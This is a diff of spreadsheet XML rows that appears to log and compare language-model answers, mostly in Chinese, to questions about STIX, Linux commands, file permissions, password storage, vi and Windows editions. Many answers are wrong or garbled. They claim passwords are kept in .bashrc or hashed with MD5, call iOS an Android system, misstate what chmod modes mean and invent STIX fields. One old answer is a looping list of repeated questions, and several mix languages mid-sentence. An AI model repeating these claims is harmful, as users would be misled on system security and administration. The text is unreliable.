-7. Incident &gt; Threat: The incident object is associated with the threat object, indicating the specific security event or situation being described.
-By defining these objects and their relationships, the STIX standard provides a structured framework for representing and sharing information about potential threats and security incidents. This can help organizations improve their threat intelligence and incident response capabilities, and better protect themselves against cyber threats.&lt;/s&gt;</t>
+          <t>STIX（Structured Threat Information Expression）是一种用于描述脚本和恶意软件的标准，它可以将这些对象关联起来，以便更好地分析和分类它们。
+在STIX标准中，对象可以通过以下方式关联起来：
+1. 对象关系：STIX中Defines a set of relationships between objects, such as "derived from", "is a part of", "is related to", etc. These relationships can be used to connect different objects and create a more comprehensive view of the threat landscape.
+2. 对象链接：STIX中允许对象之间的链接，例如，一个恶意软件对象可以链接到其中的特定模块或功能，或者一个攻击方法对象可以链接到它所使用的恶意软件或攻击工具。
+3. 对象分类：STIX中定义了一系列的分类，例如，恶意软件分类、攻击方法分类、脚本分类等，这些分类可以用来组织和抽象对象，以便更好地分析和分类它们。
+4. 对象约束：STIX中允许对象之间的约束，例如，一个恶意软件对象可以约束到它的发布者或发布时间等信息。
+通过这些方式，STIX可以帮助分析和分类脚本和恶意软件，提高对恶意软件和攻击方法的了解和预测能力。</t>
         </is>
       </c>
       <c r="D93" t="n">
-        <v>15.91870999336243</v>
+        <v>13.07098698616028</v>
       </c>
     </row>
     <row r="94">
@@ -3134,19 +3230,20 @@
       </c>
       <c r="C94" t="inlineStr">
         <is>
-          <t>？
-在STIX标准中，Indicator是一个抽象对象，用于表示攻击或漏洞的特征。具体来说，Indicator可以是：
-1. 具有签名的文件：STIX中的Indicator可以是一个签名文件，用于指示攻击或漏洞的存在。
-2. 扩展名：Indicator可以是一个扩展名，用于指示攻击或漏洞的存在。
-3. 编程接口：Indicator可以是一个编程接口，用于指示攻击或漏洞的存在。
-4. 具体识别符：Indicator可以是一个具体识别符，用于指示攻击或漏洞的存在。
-Indicator的作用是为攻击或漏洞提供一个唯一的标识符，用于在STIX数据 modelo中进行检测和分析。Indicator可以是一个简单的文件名称或扩展名，也可以是一个更复杂的对象，如一个编程接口或具体识别符。
-Indicator的具体定义取决于STIX标准的版本和使用场景。例如，STIX 1.2中Indicator是一个签名文件，用于指示攻击或漏洞的存在。而STIX 2.0中Indicator可以是一个编程接口，用于指示攻击或漏洞的存在。
-总之，Indicator对象是STIX标准中用于表示攻击或漏洞的特征的抽象对象，具体的定义和使用方式取决于STIX标准的版本和使用场景。&lt;/s&gt;</t>
+          <t>Indicator在STIX标准中是一个基于JSON的数据结构，用于表示一个策略或检测结果。Indicator可以包含一些各种数据，例如：
+1. 名称：一个字符串，用于标识Indicator。
+2. 描述：一个字符串，用于描述Indicator的含义或作用。
+3. 分类：一个字符串，用于分类Indicator，例如是否是一个攻击指南或一个检测结果。
+4. 依赖项：一个JSON对象，用于指定Indicator需要的其他数据结构。
+5. 数据：一个JSON对象，用于包含Indicator的数据。
+6. 时间：一个JSON对象，用于指定Indicator的时间相关信息。
+7. 扩展：一个字符串，用于指定Indicator的扩展信息。
+Indicator对象的结构可以通过STIX standard的JSONSchema来定义。
+Indicator对象的主要用途是作为策略或检测结果的一个基本单位来进行存储、分析和传输。它可以包含一些相关的数据，例如攻击或检测的详细信息、攻击或检测的时间和地点等。Indicator对象的结构和定义可以根据STIX standard的需求进行定制和扩展。</t>
         </is>
       </c>
       <c r="D94" t="n">
-        <v>13.48144364356995</v>
+        <v>11.03278136253357</v>
       </c>
     </row>
     <row r="95">
@@ -3160,66 +3257,27 @@
       </c>
       <c r="C95" t="inlineStr">
         <is>
-          <t>？
-STIX（Security Threat Intelligence eXchange）是一个开源的标准，用于描述和共享安全威胁INTelligence。STIX standard defines a set of XML-based data structures and schemas for representing threat intelligence information, including attack patterns.
-An attack pattern in STIX is defined as a reusable representation of a specific type of attack, including the tactics, techniques, and procedures (TTPs) used to execute the attack. An attack pattern may also include information about the attacker, the target, and the potential impact of the attack.
-Here is an example of how an attack pattern might be defined in STIX:
-```
-&lt;attackPattern&gt;
-  &lt;id&gt;T1059&lt;/id&gt;
-  &lt;name&gt;Command and Control&lt;/name&gt;
-  &lt;description&gt;An attacker uses remote access to a compromised system to execute malicious commands and exfiltrate data.&lt;/description&gt;
-  &lt;tactics&gt;
-    &lt;tactic&gt;T1059.001&lt;/tactic&gt;
-    &lt;name&gt;Establish Remote Access&lt;/name&gt;
-    &lt;description&gt;The attacker gains remote access to the compromised system using a vulnerability or other means.&lt;/description&gt;
-  &lt;/tactics&gt;
-  &lt;techniques&gt;
-    &lt;technique&gt;T1059.001.001&lt;/technique&gt;
-    &lt;name&gt;Use PsExec&lt;/name&gt;
-    &lt;description&gt;The attacker uses the PsExec tool to execute PowerShell commands on the compromised system.&lt;/description&gt;
-  &lt;/techniques&gt;
-  &lt;procedures&gt;
-    &lt;procedure&gt;T1059.001.001.001&lt;/procedure&gt;
-    &lt;name&gt;Create a scheduled task&lt;/name&gt;
-    &lt;description&gt;The attacker creates a scheduled task to execute the malicious PowerShell command at a later time.&lt;/description&gt;
-  &lt;/procedures&gt;
-  &lt;actors&gt;
-    &lt;actor&gt;Actor:A10&lt;/actor&gt;
-    &lt;name&gt;Advanced Persistent Threat (APT) Group&lt;/name&gt;
-    &lt;description&gt;The attacker is an APT group with a history of targeting sensitive organizations.&lt;/description&gt;
-  &lt;/actors&gt;
-  &lt;targets&gt;
-    &lt;target&gt;
-      &lt;id&gt;T1059&lt;/id&gt;
-      &lt;name&gt;Sensitive Data&lt;/name&gt;
-      &lt;description&gt;The attacker is targeting sensitive data, such as intellectual property or confidential customer information.&lt;/description&gt;
-    &lt;/target&gt;
-  &lt;/targets&gt;
-  &lt;impact&gt;
-    &lt;impact&gt;
-      &lt;id&gt;T1059&lt;/id&gt;
-      &lt;name&gt;Data Exfiltration&lt;/name&gt;
-      &lt;description&gt;The attacker successfully exfiltrates sensitive data from the compromised system.&lt;/description&gt;
-    &lt;/impact&gt;
-  &lt;/impact&gt;
-&lt;/attackPattern&gt;
-```
-In this example, the attack pattern is defined with the following elements:
-* `id`: a unique identifier for the attack pattern
-* `name`: a human-readable name for the attack pattern
-* `description`: a detailed description of the attack pattern
-* `tactics`: a list of tactics used to execute the attack
-* `techniques`: a list of techniques used to execute the attack
-* `procedures`: a list of procedures used to execute the attack
-* `actors`: a list of actors involved in the attack
-* `targets`: a list of targets of the attack
-* `impact`: a list of potential impacts of the attack
-By defining attack patterns in this way, STIX allows for the sharing and comparison of threat intelligence information across different organizations and systems. This can help improve the overall effectiveness of security defenses by enabling organizations to anticipate and prepare for potential attacks.&lt;/s&gt;</t>
+          <t>STIX（Security Threat Intelligence eXchange）是一个开放的标准，用于描述和分享评估和预测 cybersecurity 威胁的数据。STIX 标准中包含了一个名为“Attack Pattern”的概念，用于描述一种特定的攻击方式或攻击策略。
+According to the STIX standard, an Attack Pattern is defined as:
+* A repeatable and observable pattern of behavior that an attacker may use to exploit a vulnerability or achieve a specific goal.
+* A set of actions or steps that an attacker may take to carry out an attack.
+* A pattern of activity that can be used to identify and analyze an attack.
+An Attack Pattern typically includes the following components:
+1. Description: A brief textual description of the attack pattern.
+2. ID: A unique identifier for the attack pattern.
+3. AttackType: A categorization of the attack pattern based on its type, such as “exploit,” “social engineering,” or “denial of service.”
+4. AttackTechniques: A list of techniques that an attacker may use to carry out the attack.
+5. AttackGoals: A list of goals that the attacker may be trying to achieve through the attack.
+6. Vulnerabilities: A list of vulnerabilities that the attack pattern may exploit.
+7. Tools: A list of tools or software that an attacker may use to carry out the attack.
+8. Techniques: A list of techniques or tactics that an attacker may use to carry out the attack.
+9. Timeline: A timeline of the attack, including when it occurred, how long it lasted, and any notable events or milestones.
+10. Evidence: Any evidence that may be used to support the attack pattern, such as logs, network traffic, or other security events.
+By defining Attack Patterns in a standardized way, organizations can more easily share and compare threat intelligence data, and improve their overall cybersecurity posture.</t>
         </is>
       </c>
       <c r="D95" t="n">
-        <v>22.56059384346008</v>
+        <v>12.98320770263672</v>
       </c>
     </row>
     <row r="96">
@@ -3233,67 +3291,22 @@
       </c>
       <c r="C96" t="inlineStr">
         <is>
-          <t>？
-主流的操作系统都是哪些？
-什么是操作系统？
-操作系统的主要功能是什么？
-操作系统的类型有哪些？
-操作系统的主要特点是什么？
-操作系统的应用领域是什么？
-操作系统的发展历史是什么？
-操作系统的发展趋势是什么？
-操作系统的研发工具是什么？
-操作系统的评估指标是什么？
-操作系统的安全性是什么？
-操作系统的可扩展性是什么？
-操作系统的可靠性是什么？
-操作系统的性能是什么？
-操作系统的使用方式是什么？
-操作系统的影响力是什么？
-操作系统的竞争对手是什么？
-操作系统的发展趋势是什么？
-操作系统的应用领域是什么？
-操作系统的研发工具是什么？
-操作系统的评估指标是什么？
-操作系统的安全性是什么？
-操作系统的可扩展性是什么？
-操作系统的可靠性是什么？
-操作系统的性能是什么？
-操作系统的使用方式是什么？
-操作系统的影响力是什么？
-操作系统的竞争对手是什么？
-操作系统的发展趋势是什么？
-操作系统的应用领域是什么？
-操作系统的研发工具是什么？
-操作系统的评估指标是什么？
-操作系统的安全性是什么？
-操作系统的可扩展性是什么？
-操作系统的可靠性是什么？
-操作系统的性能是什么？
-操作系统的使用方式是什么？
-操作系统的影响力是什么？
-操作系统的竞争对手是什么？
-操作系统的发展趋势是什么？
-操作系统的应用领域是什么？
-操作系统的研发工具是什么？
-操作系统的评估指标是什么？
-操作系统的安全性是什么？
-操作系统的可扩展性是什么？
-操作系统的可靠性是什么？
-操作系统的性能是什么？
-操作系统的使用方式是什么？
-操作系统的影响力是什么？
-操作系统的竞争对手是什么？
-操作系统的发展趋势是什么？
-操作系统的应用领域是什么？
-操作系统的研发工具是什么？
-操作系统的评估指标是什么？
-操作系统的安全性是什么？
-操作系</t>
+          <t>主流的操作系统有哪些？以下是一些常见的主流操作系统：
+1. Microsoft Windows：Windows是最流行的操作系统之一，包括Windows 10、Windows 8.1、Windows 8、Windows 7等版本。
+2. macOS：macOS是苹果公司提供的操作系统，用于苹果電腦和平板电脑。
+3. Linux：Linux是一种开源的操作系统，可以用于个人电脑、服务器、网络设备和其他设备。Linux有很多不同的 Distribution，包括Ubuntu、Debian、Fedora、CentOS等。
+4. Android：Android是一种基于Linux的安卓操作系统，用于智能手机、平板电脑和其他设备。
+5. iOS：iOS是苹果公司提供的安卓操作系统，用于苹果电脑和平板电脑。
+6. Chrome OS：Chrome OS是一种基于Chrome浏览器的操作系统，用于数据搜尋公司提供的桌面电脑和平板电脑。
+7. BSD：BSD是一种基于4.4BSD Unix的操作系统，可以用于个人电脑、服务器和其他设备。
+8. Solaris：Solaris是oracle公司提供的操作系统，用于服务器和cloud computing环境。
+9. AIX：AIX是IBM提供的操作系统，用于IBM Power Architecture处理器上的服务器和主frames。
+10. HP-UX：HP-UX是Hewlett-Packard提供的操作系统，用于HP的 servers和工作站。
+这些操作系统都有很好的支持和资源，可以满足各种用途和需求。</t>
         </is>
       </c>
       <c r="D96" t="n">
-        <v>26.49403142929077</v>
+        <v>14.46182417869568</v>
       </c>
     </row>
     <row r="97">
@@ -3307,23 +3320,27 @@
       </c>
       <c r="C97" t="inlineStr">
         <is>
-          <t>？
- answered Jun 29, 2022 by linxer (30 points)
-在Linux系统中，创建文件夹的命令为`mkdir`.
-例如，要创建一个名为`myfolder`的文件夹，可以使用以下命令：
+          <t>Linux 系统中创建文件夹的命令是 `mkdir`.
+例如，要创建一个名为 `myfolder` 的文件夹，可以使用以下命令：
 ```
 mkdir myfolder
 ```
-如果要创建一个文件夹并在其中创建一个名为`file.txt`的文件，可以使用以下命令：
-```
-mkdir myfolder; echo "Hello, world!" &gt; myfolder/file.txt
-```
-在这个例子中，`mkdir`命令创建了一个名为`myfolder`的文件夹，然后`echo`命令创建了一个名为`file.txt`的文件并将其写入到`myfolder`文件夹中。
-需要注意的是，如果要创建一个文件夹的路径，需要使用`/`符，例如：`mkdir /myfolder`。&lt;/s&gt;</t>
+如果要创建一个文件夹的层次结构，可以使用 `mkdir -p` 命令，例如：
+```
+mkdir -p myfolder/subfolder
+```
+这将创建一个名为 `myfolder` 的文件夹，并在其中创建一个名为 `subfolder` 的子文件夹。
+如果要创建一个文件夹并且设置其权限，可以使用 `chmod` 命令，例如：
+```
+mkdir myfolder
+chmod 755 myfolder
+```
+这将创建一个名为 `myfolder` 的文件夹，并将其权限设置为可读、可写和可执行，但不能创建新的子文件夹。
+需要注意的是，`mkdir` 命令只能在 Linux 系统上使用，不能在其他操作系统上使用。</t>
         </is>
       </c>
       <c r="D97" t="n">
-        <v>6.94675087928772</v>
+        <v>8.258902072906494</v>
       </c>
     </row>
     <row r="98">
@@ -3337,25 +3354,33 @@
       </c>
       <c r="C98" t="inlineStr">
         <is>
-          <t>？
- Linux 系统文件的权限是指该文件可以访问、写入、读取或执行的权限。 Linux 系统文件的权限由文件系统、用户和组共同确定。
-下面是 Linux 系统文件的权限几种常见情况：
-1. 用户文件权限（User File Permissions）：
-用户文件权限控制了文件的访问权限，包括读取、写入、执行和修改。用户文件权限使用三个数字，分别表示用户可读取、写入和执行的权限。例如，如果一个文件的用户文件权限为 644，则用户可以读取、写入和执行该文件，但不能修改它。
-2. 组文件权限（Group File Permissions）：
-组文件权限控制了文件的访问权限，与用户文件权限类似，但是 Control 的是组的访问权限。组文件权限使用三个数字，分别表示组可读取、写入和执行的权限。例如，如果一个文件的组文件权限为 755，则组可以读取、写入和执行该文件，但不能修改它。
-3. 文件系统权限（File System Permissions）：
-文件系统权限控制了文件系统的访问权限，包括读取、写入和执行。文件系统权限使用三个数字，分别表示文件系统可读取、写入和执行的权限。例如，如果一个文件的文件系统权限为 755，则文件系统可以读取、写入和执行该文件，但不能修改它。
-4. 文件类型权限（File Type Permissions）：
-文件类型权限控制了特定类型的文件的访问权限。例如，一个操作系统可能会设置特定类型的文件（如配置文件）不可读取或不可写入。
-5. 父目录权限（Parent Directory Permissions）：
-父目录权限控制了子目录的访问权限。父目录权限使用三个数字，分别表示父目录可读取、写入和执行的权限。例如，如果一个目录的父目录权限为 755，则父目录可以读取、写入和执行该目录，但不能修改它。
-6. 虚拟主机权限（Virtual Host Permissions）：
-虚拟主机权限控制了虚拟主机（如 Apache）的访问权限。虚拟主机权限使用三个数字，分别表示虚拟主机可读取、写入和执行的权限。例如，如果一个虚拟主机的虚拟主机权限为 755，则虚拟主机可以读取、写入和执行该虚拟主机，</t>
+          <t>Linux系统文件的权限可以通过setsid来设置，这种命令可以将权限设置到指定的文件和目录。
+| 权限 | 描述 |
+| --- | --- |
+| rwx | 读取、写入和执行文件 |
+| r-x | 读取文件但不能写入或执行 |
+| r-- | 读取文件但不能写入或执行 |
+| - | 禁止读取、写入和执行文件 |
+例如，要将文件 `example.txt` 的权限设置为可读、可写但不能执行，可以使用以下命令：
+```
+sudo chmod 644 example.txt
+```
+其中，`644` 是文件的权限值，表示可读、可写但不能执行。
+还可以使用 `chmod` 命令来设置文件的权限，例如：
+```
+sudo chmod u=rw,g=r,o=r example.txt
+```
+其中，`u` 表示用户权限，`g` 表示组权限，`o` 表示其他用户权限。这种方式可以设置文件的权限为用户可读、用户可写，组可读但不能执行，其他用户可以读取文件但不能写入或执行。
+此外，Linux系统还可以使用 `chown` 命令来更改文件的权限，例如：
+```
+sudo chown user:group example.txt
+```
+其中，`user` 表示文件的新 влаquent，`group` 表示文件的新组。这种方式可以将文件的权限设置为指定的用户和组。
+总之，Linux系统文件的权限可以通过多种方式来设置，包括使用 `chmod`、`chown` 命令，也可以使用其他命令来设置文件的权限。</t>
         </is>
       </c>
       <c r="D98" t="n">
-        <v>26.49496006965637</v>
+        <v>15.37045621871948</v>
       </c>
     </row>
     <row r="99">
@@ -3369,34 +3394,42 @@
       </c>
       <c r="C99" t="inlineStr">
         <is>
-          <t>和网络配置？
-在Linux系统上可以使用`ifconfig`和`ip addr`命令来查看网络配置和IP地址。
-使用`ifconfig`命令可以查看当前网络接口的状态和配置，包括地址、网络名称、MTU等。例如：
-```
-$ ifconfig
-```
-这将显示当前网络接口的状态和配置。
-使用`ip addr`命令可以查看当前系统的IP地址和网络配置。例如：
+          <t>在Linux系统中，可以使用多种命令来查看系统的IP地址。以下是常用的一些命令：
+1. 使用`ifconfig`命令
+使用`ifconfig`命令可以查看系统的网络接口的IP地址。例如，要查看eth0的IP地址，可以使用以下命令：
+```
+$ ifconfig eth0
+```
+在命令行中输入`ifconfig`命令后，系统会显示当前系统上的网络接口的状态和地址。
+2. 使用`ip`命令
+使用`ip`命令可以查看系统的IP地址和网络配置。例如，要查看系统的IP地址和网络配置，可以使用以下命令：
 ```
 $ ip addr
 ```
-这将显示当前系统的IP地址和网络配置。
-如果您想要查看整个系统中的所有网络接口和IP地址，可以使用`netstat -an`命令。这将显示当前系统中的所有网络接口和IP地址，包括状态和配置。例如：
-```
-$ netstat -an
-```
-这将显示当前系统中的所有网络接口和IP地址，包括状态和配置。
-如果您想要查看某个网络接口的详细信息，可以使用`ifconfig`命令和`ip addr`命令。例如，要查看eth0网络接口的详细信息，可以使用以下命令：
-```
-$ ifconfig eth0
-$ ip addr show eth0
-```
-这将显示eth0网络接口的状态和配置，以及其相关的IP地址。
-需要注意的是，不同的Linux Distribution可能有不同的命令和选项。以上命令和选项只是一些常见的命令和选项，可以根据具体的情况进行选择和使用。&lt;/s&gt;</t>
+这个命令会显示系统的IP地址和网络配置。
+3. 使用`route`命令
+使用`route`命令可以查看系统的网络配置和路由表。例如，要查看系统的网络配置和路由表，可以使用以下命令：
+```
+$ route -n
+```
+这个命令会显示系统的网络配置和路由表。
+4. 使用`ip link`命令
+使用`ip link`命令可以查看系统的网络接口和网络配置。例如，要查看系统的网络接口和网络配置，可以使用以下命令：
+```
+$ ip link
+```
+这个命令会显示系统的网络接口和网络配置。
+5. 使用`networkctl`命令
+使用`networkctl`命令可以查看系统的网络配置和路由表。例如，要查看系统的网络配置和路由表，可以使用以下命令：
+```
+$ networkctl
+```
+这个命令会显示系统的网络配置和路由表。
+这些命令都可以帮助您查看Linux系统的IP地址。根据需要选择适合的命令来查看系统的IP地址。&lt;/s&gt;</t>
         </is>
       </c>
       <c r="D99" t="n">
-        <v>13.05539965629578</v>
+        <v>15.52798914909363</v>
       </c>
     </row>
     <row r="100">
@@ -3410,15 +3443,16 @@
       </c>
       <c r="C100" t="inlineStr">
         <is>
-          <t>？  How Linux stores the password for a user?
-Linux stores user passwords in a file called `/etc/passwd`. This file contains a list of all user accounts on the system, along with their username, user ID, group ID, and password hash.
-The password hash is a one-way encryption of the user's password, which means that it is impossible to recover the original password from the hash value. The hash value is generated using a cryptographic hash function, such as bcrypt or PBKDF2, and is stored in the `/etc/passwd` file.
-When a user logs in, the system compares the entered password with the hash value stored in the `/etc/passwd` file. If the entered password matches the hash value, the user is authenticated and granted access to the system. If the entered password does not match the hash value, the user is denied access.
-It's worth noting that the password hash value is not stored in plaintext in the `/etc/passwd` file. Instead, it is encrypted using a cryptographic algorithm, which makes it difficult for unauthorized users to access the password hash value.&lt;/s&gt;</t>
+          <t>Linux 系统中，用户的密码通常会被存储在以下文件中：
+1. /etc/passwd 文件：这是 Linux 系统中的用户文件，包含每个用户的资料，包括用户名、用户 ID 和密码。
+2. /etc/shadow 文件：这是 Linux 系统中的密码文件，包含每个用户的密码，以及该密码的过期时间和重置时间。
+3. /home/user/.bash_profile 文件：如果用户的 Home 目录下有一个 .bash_profile 文件，则用户的密码将会被存储在该文件中。
+4. /home/user/.bashrc 文件：如果用户的 Home 目录下有一个 .bashrc 文件，则用户的密码将会被存储在该文件中。
+需要注意的是，Linux 系统中不会直接将用户的密码存储在磁盘上，而是通过加密和约束来保存密码。例如，Linux 系统中使用的是脱敏hash（MD5）加密算法来加密密码，并且将密码的摘要存储在文件中。因此，即使攻击者突破了Linux系统的安全防范，也无法直接获取用户的密码。&lt;/s&gt;</t>
         </is>
       </c>
       <c r="D100" t="n">
-        <v>6.460970878601074</v>
+        <v>10.22962069511414</v>
       </c>
     </row>
     <row r="101">
@@ -3432,47 +3466,31 @@
       </c>
       <c r="C101" t="inlineStr">
         <is>
-          <t>？
-vi编辑器是一款功能强大且简单易用的文本编辑器，它在Linux系统中非常流行。vi编辑器提供了许多快捷键和命令，可以快速编辑文本文件。下面是一些常用的编辑、保存和退出操作：
-编辑操作：
-1. 输入： vi filename (其中filename是要编辑的文本文件的名称)
-2. 使用： i（ inserte Mode），a（ add Mode），c（ replace Mode），w（ write Mode）
-3. 删除： d（ delete Characters），x（ delete Lines），r（ delete Word）
-4. 复制： y（ copy Line），Y（ copy Word），p（ paste Line），P（ paste Word）
-5. 粘贴： paste（ paste from clipboard），P（ paste from clipboard）
-6. 改变： t（ change Text），T（ change Text）
-7. 替换： r（ replace Text），R（ replace Text）
-8. 新建： n（ create New Line），N（ create New Line）
-9. 移动： m（ move Line），M（ move Line）
-10. 格式化： f（ format Text），F（ format Text）
-保存操作：
-1. 输入： :w (write to file) or :wq (write and quit)
-2. 使用： :q (quit without saving)，:q! (quit and discard changes)
-退出操作：
-1. 输入： :q (quit) or :q! (quit and discard changes)
-2. 使用： :wq (write and quit)，:x (save and quit)
-其他常用的快捷键和命令还包括：
-* :, ( move cursor to the beginning of the line)
-* :#, ( move cursor to the end of the line)
-* :$ ( move cursor to the end of the file)
-* :G ( move cursor to the last occurrence of a word)
-* :Gr ( move cursor to the last occurrence of a regular expression)
-* :H ( move cursor to the line before the current line)
-* :L ( move cursor to the line after the current line)
-* :P ( move cursor to the previous occurrence of a word)
-* :Pm ( move cursor to the previous occurrence of a word and move the cursor down)
-* :Pr ( move cursor to the next occurrence of a word)
-* :Pr ( move cursor to the next occurrence of a word and move the cursor down)
-* :S ( move cursor to the start of the line)
-* :Sc ( move cursor to the start of the line and move the cursor down)
-* :S- ( move cursor to the start of the line and move the cursor up)
-* :S# ( move cursor to the start of the line and move the cursor to the end of the line)
-* :S-$ ( move cursor to the start of the line and move the cursor to the end of the file)
-需要注意的是，vi编辑器的快捷键和命令可以根据需要根据具体的用法和命令来更改。这些快捷键和命令都可以通过在vi编辑器中输入： :h (help)来查看具体的快捷键和命令。&lt;/s&gt;</t>
+          <t>](https://www.zhihu.com/question/33871915)
+Vi是一款流行的文本编辑器，它具有简单易用的用户界面和功能rich的功能集。以下是编辑、保存和退出 Vi 的基本操作：
+1. 编辑文本：
+在 Vi 中，你可以编辑文本使用缓冲区和命令。缓冲区是 Vi 中的基本单元，用于编辑文本。你可以输入命令来将文本inserted、Deleted、追加或替换。
+例如，要在缓冲区中 insert 一个新的 line，可以使用 "i" 命令，例如：
+ :10iHello World!
+这将在第 10 行中 insert 一个新的 line "Hello World!"。
+2. 保存文本：
+在 Vi 中，你可以保存文本使用 "w" 命令。这将将当前缓冲区的文本保存到文件中。例如，要保存当前文本，可以使用以下命令：
+:w file.txt
+这将将当前缓冲区的文本保存到 "file.txt" 文件中。
+3. 退出 Vi：
+在 Vi 中，你可以退出使用 "q" 命令。这将结束 Vi 的实例。例如，要退出 Vi，可以使用以下命令：
+:q
+这将结束 Vi 的实例，并返回到命令行。
+其他一些常用的命令包括：
+* "e" 命令：编辑选定的文本。
+* "d" 命令：删除选定的文本。
+* "y" 命令：追加选定的文本。
+* "c" 命令：替换选定的文本。
+希望这些信息可以帮助你开始使用 Vi。&lt;/s&gt;</t>
         </is>
       </c>
       <c r="D101" t="n">
-        <v>22.92738437652588</v>
+        <v>14.65418124198914</v>
       </c>
     </row>
     <row r="102">
@@ -3486,50 +3504,53 @@
       </c>
       <c r="C102" t="inlineStr">
         <is>
-          <t>？
- Linux 系统可以使用 `static` 网络配置来配置静态 IP 地址。以下是一些常见的方法：
-1. 使用 `ifup` 命令
-在系统中安装 `ifup` 命令，然后使用以下命令来配置静态 IP：
-```
-sudo ifup &lt;interface&gt; static &lt;IP address&gt; &lt;netmask&gt;
-```
-其中 `&lt;interface&gt;` 是要配置的网络接口， `&lt;IP address&gt;` 是静态 IP 地址， `&lt;netmask&gt;` 是网络掩码。
-例如，要配置 eth0 接口的静态 IP，可以使用以下命令：
-```
-sudo ifup eth0 static 192.168.1.100 255.255.255.0
-```
-2. 使用 `route` 命令
-可以使用 `route` 命令来配置静态 IP。例如：
-```
-sudo route add -net &lt;IP address&gt; netmask &lt;netmask&gt; gw &lt;gateway&gt; dev &lt;interface&gt;
-```
-其中 `&lt;IP address&gt;` 是静态 IP 地址， `&lt;netmask&gt;` 是网络掩码， `&lt;gateway&gt;` 是网络 gateway， `&lt;interface&gt;` 是要配置的网络接口。
-例如，要配置 eth0 接口的静态 IP，可以使用以下命令：
-```
-sudo route add -net 192.168.1.100 netmask 255.255.255.0 gw 192.168.1.1 dev eth0
-```
-3. 使用 `network` 文件
-可以使用 `network` 文件来配置静态 IP。例如：
-```
-sudo nano /etc/network/interfaces
-```
-在这个文件中添加以下内容：
-```
-iface eth0 static
- address 192.168.1.100
- netmask 255.255.255.0
-```
-4. 使用 `dhcpcd` 命令
-可以使用 `dhcpcd` 命令来配置静态 IP。例如：
-```
-sudo dhcpcd -i eth0 -r 192.168.1.100 -n 255.255.255.0
-```
-其中 `-i eth0` 是要配置的网络接口， `-r` 是静态 IP 地址， `-n` 是网络掩码。
-这些方法可以单独使用，也可以结合使用以实现不同的需求。&lt;/s&gt;</t>
+          <t>地址？
+在 Linux 系统上配置静态 IP 地址是一件比较复杂的任务，需要通过一些方法来完成。以下是一些常见的方法：
+1. 使用网络Manager
+在 Ubuntu 和其他的 Linux  distribution 中，可以使用网络Manager来配置静态 IP 地址。请参阅以下步骤：
+a. 打开网络Manager：在终端中输入以下命令：
+`sudo network-manager`
+b. 在网络Manager中选择你的网络 интерフェース，并单击“Edit”按钮。
+c. 在编辑界面中，单击“IPv4Settings”按钮，并在“Method”下选择“Static”。
+d. 在“Address”框中输入你想要配置的静态 IP 地址，并将“Netmask”、“Gateway”和“DNS”框中的值设置为你的网络设备的相应设置。
+e. 单击“Save”按钮以保存配置。
+2. 使用 `/etc/network/interfaces` 文件
+在 Linux 系统上，你可以使用 `/etc/network/interfaces` 文件来配置静态 IP 地址。以下是一个示例配置：
+```
+# /etc/network/interfaces
+iface eth0 inet static
+    address 192.168.1.100
+    netmask 255.255.255.0
+    gateway 192.168.1.1
+    dns 8.8.8.8
+```
+在上面的配置中，我们将 eth0 网络interface 配置为静态 IP 地址，其中的 address 欄中输入了你想要配置的 IP 地址，netmask 欄中输入了你的网络设备的网络掩码， gateway 欄中输入了你的网络设备的网络 gateway，并将 dns 欄中的值设置为你的 DNS 服务器的 IP 地址。
+3. 使用 udev 规则
+在 Linux 系统上，你可以使用 udev 规则来配置静态 IP 地址。udev 规则可以在系统启动时自动执行配置任务。以下是一个示例配置：
+```
+# /etc/udev/rules.d/70-persistent-net.rules
+KERNEL=="eth0", RUN+="/sbin/ifup eth0"
+```
+在上面的配置中，我们将 eth0 网络interface 配置为静态 IP 地址，并在系统启动时自动执行 ifup 命令。
+4. 使用 systemd 配置文件
+在 Linux 系统上，你可以使用 systemd 配置文件来配置静态 IP 地址。以下是一个示例配置：
+```
+# /etc/systemd/network/99-eth0.network
+[Network]
+Address=192.168.1.100/24
+Gateway=192.168.1.1
+DNS=8.8.8.8
+[Interface]
+Address=eth0
+[Network]
+Hint=eth0
+```
+在上面的配置中，我们将 eth0 网络interface 配置为静态 IP 地址，其中的 Address 欄中输入了你想要配置的 IP 地址，Gateway 欄中输入了你的网络设备的网络 gateway，DNS 欄中输入了你的 DNS 服务器的 IP 地址。
+这些方法可以单独使用，也可以组合使用以便更好地配置静态 IP 地址。具体的方法取决于你的 Linux distribution 和网络设备的类型。&lt;/s&gt;</t>
         </is>
       </c>
       <c r="D102" t="n">
-        <v>18.44834780693054</v>
+        <v>29.26199746131897</v>
       </c>
     </row>
     <row r="103">
@@ -3543,18 +3564,26 @@
       </c>
       <c r="C103" t="inlineStr">
         <is>
-          <t>？
-Microsoft Windows 中有许多版本，其中一些更加安全。根据安全性和可用性的评估，以下是一些可能最安全的版本：
-1. Windows 10 Pro: Windows 10 Pro 是最新的主流版本，它提供了许多安全功能，包括一键更新、磁盘加密、防火墙和权限控制等。它还支持 Hyper-V，可以在虚拟环境中运行其他操作系统。
-2. Windows 10 Enterprise: Windows 10 Enterprise 是企业版本，它具有更多的安全功能，如隐藏文件、远程访问和集成多重 Authentication。它适用于大型企业和政府机构。
-3. Windows Server 2019: Windows Server 2019 是 Windows 系统的最新版本，它提供了许多新的安全功能，如一键更新、防火墙和权限控制等。它适用于大型企业和政府机构。
-4. Windows 8.1 Pro: Windows 8.1 Pro 是 Windows 8 的一个版本，它具有许多安全功能，如防火墙和权限控制等。它还支持 BitLocker 随机加密。
-5. Windows 7 Professional: Windows 7 Professional 是 Windows 7 的一个版本，它具有许多安全功能，如权限控制、防火墙和一键更新等。它适用于企业和个人用户。
-需要注意的是，无论哪种版本的 Windows 您选择，都需要保持它在最新的安全更新中，以确保最高的安全性。&lt;/s&gt;</t>
+          <t>Windows 10 是 Microsoft 最新发布的操作系统，它具有许多安全功能和改进，但是不同的版本之间有所不同。以下是 Windows 10 的不同版本之间的安全差异：
+1. Home vs. Pro vs. Enterprise:
+	* Home Edition 没有安全性更高的功能，如 BitLocker 和 Windows Defender Advanced Threat Protection (WDATP)，但它仍然具有一些基本的安全功能。
+	* Pro Edition 具有较多的安全功能，如 BitLocker 和 WDATP，以及一些企业级安全功能，如 Group Policy 和 Active Directory 支持。
+	* Enterprise Edition 具有较多的安全功能和企业级特性，如 BitLocker 和 WDATP，以及许多其他的安全功能，如 Windows Defender Exploit Guard、Windows Defender Application Control 和 Windows Defender Credential Guard。
+2. Creators Update vs. Anniversary Update:
+	* Creators Update 增强了 Windows 10 的安全功能，添加了一些新的安全功能，如 Windows Defender Exploit Guard 和 Windows Defender Application Control。
